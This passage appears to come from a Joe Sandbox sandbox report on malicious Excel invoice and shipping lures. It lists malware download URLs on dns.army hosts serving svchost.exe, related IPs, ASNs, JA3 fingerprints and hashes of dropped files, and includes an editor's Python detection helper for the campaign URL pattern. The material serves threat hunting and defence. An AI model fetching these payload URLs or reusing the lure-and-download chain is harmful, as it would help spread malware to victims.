                | Order Requirment.xlsx                       | malicious | workfinestdyrainbost.dns.army/receipwt/svchost.exe
                | Vietcong Order February.xlsx                | malicious | workfinestdyrainbost.dns.army/receipwt/svchost.exe
                | Tyre List.xlsx                              | malicious | wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                | New -PO January.xlsx                        | malicious | wsdyworkfinesanothws.dns.navy/worksdoc/svchost.exe
                | IMG-CMR.xlsx                                | malicious | workfinestdysanothtp.dns.army/worksdoc/svchost.exe
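The download URLs in the 103.141.138.118 rows share one shape: a subdomain assembled from a few recurring fragments (workfine, stdy/wsdy/thdy, rain/traist/sanoth) under a dynamic-DNS suffix, a single-word directory, and a payload always named svchost.exe. The following Python helper, added here by the editor and not part of the Joe Sandbox report, turns that observation into a hunting check that generalizes past the exact hosts listed. The URL list is constructed from this page plus two decoys; the token list, the suffix list and the two-token threshold are the editor's assumptions.

```python
"""Hunting helper for the download-URL shape seen in the IP context table:
<tokens+tail>.dns.army|dns.navy / <dir> / svchost.exe.

Added example by the editor, not code from the Joe Sandbox report.
SAMPLE_URLS is constructed from the URLs on this page plus two benign
decoys; TOKENS, DDNS_SUFFIXES and the >= 2 threshold are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Dynamic-DNS suffixes that appear in the context table.
DDNS_SUFFIXES = (".dns.army", ".dns.navy")

# Fragments that recur in the subdomain labels listed above (assumption:
# each label is built from a few of these plus a short random tail).
TOKENS = ("workfine", "stdy", "wsdy", "thdy", "rain", "traist", "sanoth")

# /<single word>/svchost.exe ; any query string is ignored by urlsplit.
PAYLOAD_PATH_RE = re.compile(r"^/([A-Za-z]+)/svchost\.exe$")


def split_url(url):
    """Return (host, path) for a URL that may be written without a scheme."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path


def token_hits(label):
    """Number of known campaign tokens contained in one DNS label."""
    return sum(1 for token in TOKENS if token in label)


def is_campaign_url(url):
    """True when the host sits under a DDNS suffix, its first label reuses at
    least two campaign tokens, and the path is /<dir>/svchost.exe."""
    host, path = split_url(url)
    if not host.endswith(DDNS_SUFFIXES):
        return False
    first_label = host.split(".")[0]
    return token_hits(first_label) >= 2 and PAYLOAD_PATH_RE.match(path) is not None


def campaign_key(url):
    """(directory, ddns suffix) pair used to group related infrastructure."""
    host, path = split_url(url)
    match = PAYLOAD_PATH_RE.match(path)
    suffix = next((s for s in DDNS_SUFFIXES if host.endswith(s)), None)
    return (match.group(1) if match else None, suffix)


def cluster(urls):
    """Map each (directory, suffix) key to the sorted list of matching hosts."""
    groups = defaultdict(set)
    for url in urls:
        if is_campaign_url(url):
            groups[campaign_key(url)].add(split_url(url)[0])
    return {key: sorted(hosts) for key, hosts in groups.items()}


# Constructed from the context table on this page; the last two are decoys.
SAMPLE_URLS = [
    "stdyworkfinetraistfh.dns.army/findoc/svchost.exe",
    "workfinewsdytraistbk.dns.army/findoc/svchost.exe",
    "stdyworkfinetraistmg.dns.army/findoc/svchost.exe",
    "thdyworkfinerainball.dns.army/findoc/svchost.exe?platform=hootsuite",
    "thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite",
    "thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite",
    "thdyworkfinerainbotm.dns.army/findoc/svchost.exe",
    "workfinestdyrainbost.dns.army/findoc/svchost.exe",
    "wsdyworkfinerainbows.dns.army/receipwt/svchost.exe",
    "workfinestdyrainbost.dns.army/receipwt/svchost.exe",
    "wsdyworkfinesanothws.dns.navy/worksdoc/svchost.exe",
    "workfinestdysanothtp.dns.army/worksdoc/svchost.exe",
    "http://windowsmedia.com/redir/services.asp?WMPFriendly=true",  # benign memory string
    "update.dns.army/findoc/svchost.exe",                           # DDNS host without campaign tokens
]


def hunt(urls=SAMPLE_URLS):
    """Return the matching URLs and their infrastructure clusters."""
    hits = [u for u in urls if is_campaign_url(u)]
    return hits, cluster(urls)


if __name__ == "__main__":
    hits, groups = hunt()
    print(f"{len(hits)} of {len(SAMPLE_URLS)} URLs match the campaign shape")
    for key, hosts in sorted(groups.items()):
        print(key, hosts)
```

The token requirement is what keeps this from being a plain "anything under dns.army" rule: the decoy update.dns.army host is rejected even though it uses the same suffix and path. Tune TOKENS as new hosts appear in the context tables; the clustering by (directory, suffix) is a cheap way to see which hosts were in use in the same phase of the campaign.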

Domains

Match                         | Associated Sample Name / URL         | Detection | Context
stdyworkfinetraistfh.dns.army | Al Rabiah Trade Requirment.xlsx      | malicious | 103.141.138.118
is.gd                         | _ShipDoc_CI_PL_HBL_.xlsx             | malicious | 104.25.234.53
                              | xpy9BhQR3t.xlsx                      | malicious | 104.25.234.53
                              | VSLS PARTICULARS.xlsx                | malicious | 172.67.83.132
                              | PAYMENT ADVICE.xlsx                  | malicious | 104.25.234.53
                              | Original Invoice-COAU7230734290.xlsx | malicious | 104.25.234.53
                              | Invoice.xlsx                         | malicious | 104.25.234.53
                              | NEW ORDER CONFIRMATION.xlsx          | malicious | 104.25.234.53
                              | Customer Account Details.docx        | malicious | 172.67.83.132
                              | New Order.xlsx                       | malicious | 172.67.83.132
                              | purchase order.xlsx                  | malicious | 104.25.234.53
                              | RFQ 4168.xlsx                        | malicious | 104.25.234.53
                              | invoice bank.xlsx                    | malicious | 104.25.233.53
                              | New Order.xlsx                       | malicious | 104.25.233.53
                              | Draft Shipping Documents.xlsx        | malicious | 104.25.234.53
                              | COAU7229898130.xlsx                  | malicious | 172.67.83.132
                              | MV Sky Marine.xlsx                   | malicious | 172.67.83.132
                              | Al Rabiah Trade Requirment.xlsx      | malicious | 104.25.233.53
                              | Vsl Stowage plan _Particulars.xlsx   | malicious | 172.67.83.132
                              | LoadingdocMVSORSI.xlsx               | malicious | 172.67.83.132
                              | draft bill VCSC2100266.xlsx          | malicious | 104.25.233.53

ASN

Match                                                      | Associated Sample Name / URL                         | Detection | Context
CLOUDFLARENET (US)                                         | _ShipDoc_CI_PL_HBL_.xlsx                             | malicious | 104.25.234.53
                                                           | X2W37wTRCN.dll                                       | malicious | 104.20.185.68
                                                           | Pi_34568723.exe                                      | malicious | 104.21.87.185
                                                           | ORDER-331.xls.exe                                    | malicious | 172.67.145.154
                                                           | BL Draft copy.exe                                    | malicious | 172.67.207.142
                                                           | Lista de nuevos pedidos.exe                          | malicious | 162.159.130.233
                                                           | Swift Copy Against due Invoice.PDF.exe               | malicious | 172.64.207.3
                                                           | Shipping doc_.exe                                    | malicious | 104.21.87.185
                                                           | onbgX3WswF.exe                                       | malicious | 23.227.38.74
                                                           | Ref150420190619A-B0270PEL. pdf.exe                   | malicious | 172.64.206.3
                                                           | PO 2100020608-77003731.exe                           | malicious | 172.67.189.8
                                                           | scan-100218.docm                                     | malicious | 104.21.71.207
                                                           | SecuriteInfo.com.Trojan.DownLoader38.17696.30952.exe | malicious | 172.67.145.154
                                                           | ORDER_PDF.exe                                        | malicious | 23.227.38.74
                                                           | UzEdq6cXTa.dll                                       | malicious | 104.20.184.68
                                                           | TXZiKhMb8J.exe                                       | malicious | 172.67.145.154
                                                           | 8090800.exe                                          | malicious | 172.67.188.154
                                                           | g0g865fQ2S.exe                                       | malicious | 104.21.65.7
                                                           | list.dwg.exe                                         | malicious | 23.227.38.74
                                                           | xX6hYVpN8T.exe                                       | malicious | 172.67.145.154
VNPT-AS-VN VIETNAM POSTS AND TELECOMMUNICATIONS GROUP (VN) | _ShipDoc_CI_PL_HBL_.xlsx                             | malicious | 103.99.1.159
                                                           | Pago 31 Mar 2021 at 2.15PP3343PDF.jar                | malicious | 103.133.109.176
                                                           | DHL Shipment Notification 0012151100.exe             | malicious | 103.151.123.132
                                                           | DHLMar 2021 at 4.508BZ290PDF.jar                     | malicious | 103.133.109.176
                                                           | xpy9BhQR3t.xlsx                                      | malicious | 103.99.1.172
                                                           | VSLS PARTICULARS.xlsx                                | malicious | 103.133.106.243
                                                           | Original Invoice-COAU7230734290.xlsx                 | malicious | 103.99.1.172
                                                           | Invoice.xlsx                                         | malicious | 103.125.191.187
                                                           | DHLMar 2021 at 9.708BZ290PDF.jar                     | malicious | 103.133.109.176
                                                           | NEW ORDER CONFIRMATION.xlsx                          | malicious | 103.141.138.132
                                                           | DHLMar 2021 at 9.108BZ290PDF.jar                     | malicious | 103.133.109.176
                                                           | Customer Account Details.docx                        | malicious | 103.125.191.187
                                                           | New Order.xlsx                                       | malicious | 103.141.138.132
                                                           | purchase order.xlsx                                  | malicious | 103.99.1.149
                                                           | RFQ 4168.xlsx                                        | malicious | 103.133.106.243
                                                           | invoice bank.xlsx                                    | malicious | 103.141.138.117
                                                           | New Order.xlsx                                       | malicious | 103.141.138.132
                                                           | INV2102-MDRTCL.xlsx                                  | malicious | 103.125.191.69
                                                           | Payment Invoice.exe                                  | malicious | 103.151.123.132
                                                           | ZuCp27hikl.exe                                       | malicious | 103.141.136.23

JA3 Fingerprints

Match                            | Associated Sample Name / URL         | Detection | Context
36f7277af969a6947a61ae0b815907a1 | _ShipDoc_CI_PL_HBL_.xlsx             | malicious | 172.67.83.132
                                 | xpy9BhQR3t.xlsx                      | malicious | 172.67.83.132
                                 | VSLS PARTICULARS.xlsx                | malicious | 172.67.83.132
                                 | PAYMENT ADVICE.xlsx                  | malicious | 172.67.83.132
                                 | Original Invoice-COAU7230734290.xlsx | malicious | 172.67.83.132
                                 | Invoice.xlsx                         | malicious | 172.67.83.132
                                 | NEW ORDER CONFIRMATION.xlsx          | malicious | 172.67.83.132
                                 | Customer Account Details.docx        | malicious | 172.67.83.132
                                 | Payment Proof.xlsx                   | malicious | 172.67.83.132
                                 | New Order.xlsx                       | malicious | 172.67.83.132
                                 | purchase order.xlsx                  | malicious | 172.67.83.132
                                 | RFQ 4168.xlsx                        | malicious | 172.67.83.132
                                 | invoice bank.xlsx                    | malicious | 172.67.83.132
                                 | New Order.xlsx                       | malicious | 172.67.83.132
                                 | uIIHdM0MHt.rtf                       | malicious | 172.67.83.132
                                 | Draft Shipping Documents.xlsx        | malicious | 172.67.83.132
                                 | COAU7229898130.xlsx                  | malicious | 172.67.83.132
                                 | MV Sky Marine.xlsx                   | malicious | 172.67.83.132
                                 | Al Rabiah Trade Requirment.xlsx      | malicious | 172.67.83.132
                                 | Vsl Stowage plan _Particulars.xlsx   | malicious | 172.67.83.132

Every JA3 match pairs the same fingerprint with the same Cloudflare address, so this pivot reflects the TLS client and shortener combination shared by these lures on the analysis system rather than anything specific to this sample; treat it as corroboration, not as a standalone indicator.

                                                    Dropped Files

                                                    No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 73728
Entropy (8bit): 3.8027076963041346
Encrypted: false
SSDEEP: 768:EltriQ4cyKU+NSpGGLgqHXRmf9l/h97Q:7vh+NSUGLtg9Bo
MD5: 6CC6D1DD6CDD848693426A270563C921
SHA1: B7D970A91FD89E99C3533C22B14EA7B00258E011
SHA-256: 7D0B3FE8AA36FCFFB72E5A7F03E60D8F1E0A5FC211D223B84D15706C3444D817
SHA-512: 218FAD1CAF9FD03F3EBE1B6E2A5E2F3916EC37C2EDA0A99FFB816B359A7975E95B2F7DF8902BFC25F97D6ED9D532D05CE5CFACCB02E18760A2731C459F913809
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 6%
Reputation: low
IE Cache URL: http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe
Note: the preview below shows the MSVBVM60.DLL import and long null-filled runs; together with an entropy of 3.80 over 73728 bytes this indicates an unpacked VB6 binary with large padded regions rather than a packed or encrypted payload. The two antivirus results disagree sharply, so the behavioural evidence (a PE downloaded and written by EQNEDT32.EXE) is the reliable signal here.
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...x..P..................... ....................@.......................... ..............................................D...(...........................................................................(... ....................................text............................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8c74Ut[1].htm
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 5
Entropy (8bit): 1.5219280948873621
Encrypted: false
SSDEEP: 3:hn:h
MD5: FDA44910DEB1A460BE4AC5D56D61D837
SHA1: F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256: 933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512: 57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious: false
Reputation: high, very likely benign file
                                                    Preview: 0....
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\189FF3B9.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
Category: dropped
Size (bytes): 29499
Entropy (8bit): 7.667442162526095
Encrypted: false
SSDEEP: 384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
MD5: 4FBDDF16124B6C9368537DF70A238C14
SHA1: 45E34D715128C6954F589910E6D0429370D3E01A
SHA-256: 0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
SHA-512: EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
Malicious: false
Reputation: moderate, very likely benign file
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D220241.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 79394
Entropy (8bit): 7.864111100215953
Encrypted: false
SSDEEP: 1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5: 16925690E9B366EA60B610F517789AF1
SHA1: 9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256: C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512: AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious: false
Reputation: moderate, very likely benign file
                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4DC46D3C.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):51166
                                                    Entropy (8bit):7.767050944061069
                                                    Encrypted:false
                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59943EF7.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D141431.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\609FBB1D.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 94 x 142, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):9691
                                                    Entropy (8bit):7.959193699276328
                                                    Encrypted:false
                                                    SSDEEP:192:62uS2yEGqUUKfpuGBzO8DJFY/tgzqfM9Ey9F1V3lNRDCFvXR9gV:f+E7fnWtUEYbTRgfRmV
                                                    MD5:A8A216BB487BBC4AF6E1B88732A427E6
                                                    SHA1:D45419F3B1B29292B35D1FC6012E610CB92D91F1
                                                    SHA-256:110B0525BA4978477A56719B2617D5D2E51BFA9836856DA596EB049039377AE2
                                                    SHA-512:417FE0483ECB378708ED34086F6C460716B4497B3B1B87B4E513266202AD831A426F94D4B20D348A48BC02834B698033B8479F2A5221631A0AD200B929FF778E
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...^...........A....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........%DIDATx^....S..pJ...ZHf......d...A(.2gJ....<G.L.".2D.d.2..}v...s.[..u..z.9.........g...:.f..V..-c....._....On.2f)..6-..,.Kk-..@...}"zK...}.@..ne.p".........}...7....7.)..x...jn....7.l......k.....3....g.y. ....^.........^.Q^x.._..W....7.?...=.........m.+...;.(...............u.]W...x.w6/..Ry.G...[.....X.x..g....?.........~W...?...B?.}.+.p...j.z..N*..w.}.SO=.4t..74?.........QG..,..2.....c..X..B.5[n.e.)R..[..}..K.o...{..x.......G?j....f.n..z...M7..,...e..b..W.j.8...K/m~._4..{l....4..k......i.....8....~P.....4...w../....:...../}6.'.|.<. ......^.o...w.........|...m6.h........~....G.].e|.m.Ys.a..:._.....@....Ft.....'....^k.[o...m...6..[!.s..,...]..3......W_...K.s:g......%.-.Xy6m..v.L..[l.X1.7..f../....M6.9..3K...f..E...&......_...+..1./...'?.,....>DE.}..g.a0.:..y..K_q7.x.{..v.i.y.W.y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\782D07EB.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 94 x 142, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):9691
                                                    Entropy (8bit):7.959193699276328
                                                    Encrypted:false
                                                    SSDEEP:192:62uS2yEGqUUKfpuGBzO8DJFY/tgzqfM9Ey9F1V3lNRDCFvXR9gV:f+E7fnWtUEYbTRgfRmV
                                                    MD5:A8A216BB487BBC4AF6E1B88732A427E6
                                                    SHA1:D45419F3B1B29292B35D1FC6012E610CB92D91F1
                                                    SHA-256:110B0525BA4978477A56719B2617D5D2E51BFA9836856DA596EB049039377AE2
                                                    SHA-512:417FE0483ECB378708ED34086F6C460716B4497B3B1B87B4E513266202AD831A426F94D4B20D348A48BC02834B698033B8479F2A5221631A0AD200B929FF778E
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...^...........A....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!........%DIDATx^....S..pJ...ZHf......d...A(.2gJ....<G.L.".2D.d.2..}v...s.[..u..z.9.........g...:.f..V..-c....._....On.2f)..6-..,.Kk-..@...}"zK...}.@..ne.p".........}...7....7.)..x...jn....7.l......k.....3....g.y. ....^.........^.Q^x.._..W....7.?...=.........m.+...;.(...............u.]W...x.w6/..Ry.G...[.....X.x..g....?.........~W...?...B?.}.+.p...j.z..N*..w.}.SO=.4t..74?.........QG..,..2.....c..X..B.5[n.e.)R..[..}..K.o...{..x.......G?j....f.n..z...M7..,...e..b..W.j.8...K/m~._4..{l....4..k......i.....8....~P.....4...w../....:...../}6.'.|.<. ......^.o...w.........|...m6.h........~....G.].e|.m.Ys.a..:._.....@....Ft.....'....^k.[o...m...6..[!.s..,...]..3......W_...K.s:g......%.-.Xy6m..v.L..[l.X1.7..f../....M6.9..3K...f..E...&......_...+..1./...'?.,....>DE.}..g.a0.:..y..K_q7.x.{..v.i.y.W.y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B545667.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                    Category:dropped
                                                    Size (bytes):29499
                                                    Entropy (8bit):7.667442162526095
                                                    Encrypted:false
                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2B0D764.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 935x300, frames 3
                                                    Category:dropped
                                                    Size (bytes):330271
